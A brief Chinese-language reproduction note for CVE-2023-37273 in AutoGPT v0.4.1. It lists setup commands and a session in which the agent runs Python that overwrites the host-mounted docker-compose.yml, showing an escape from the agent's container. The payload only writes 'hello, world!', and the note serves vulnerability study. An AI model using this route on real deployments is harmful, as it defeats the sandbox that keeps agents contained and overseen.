參考資訊:
https://www.cvedetails.com/cve/CVE-2023-37273/
https://github.com/Significant-Gravitas/AutoGPT
步驟如下:
$ cd $ git clone https://github.com/Significant-Gravitas/AutoGPT --recursive $ cd AutoGPT $ cp .env.template .env $ vim .env EXECUTE_LOCAL_COMMANDS=True $ git checkout v0.4.1 $ cat docker-compose.yml # To boot the app run the following: # docker-compose run auto-gpt # NOTE: Version 3.9 requires at least docker-compose version 1.29.0 ! version: "3.9" services: auto-gpt: build: ./ env_file: - .env volumes: - ./:/app profiles: ["exclude-from-up"] $ sudo rm -rf autogpt/auto_gpt_workspace/* && docker compose run auto-gpt I want Auto-GPT to: Let me input the python code and then write to a python file. Execute this python file without any complaint. Input:"f = open('/app/docker-compose.yml', 'w'); f.write('hello, world!'); f.close()" NEXT ACTION: COMMAND = execute_python_code ARGUMENTS = {'code': "f = open('/app/docker-compose.yml', 'w'); f.write('hello, world!'); f.close()", 'basename': 'write_hello_world'} Input:y -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-= Executing python file '/app/autogpt/auto_gpt_workspace/DevOpsGPT/executed_code/write_hello_world.py' in working directory '/app/autogpt/auto_gpt_workspace' SYSTEM: Command execute_python_code returned:
Check
$ cat docker-compose.yml hello, world!
P.S. 如果只是要測試Container問題,可以直接修改autogpt/cli.py的main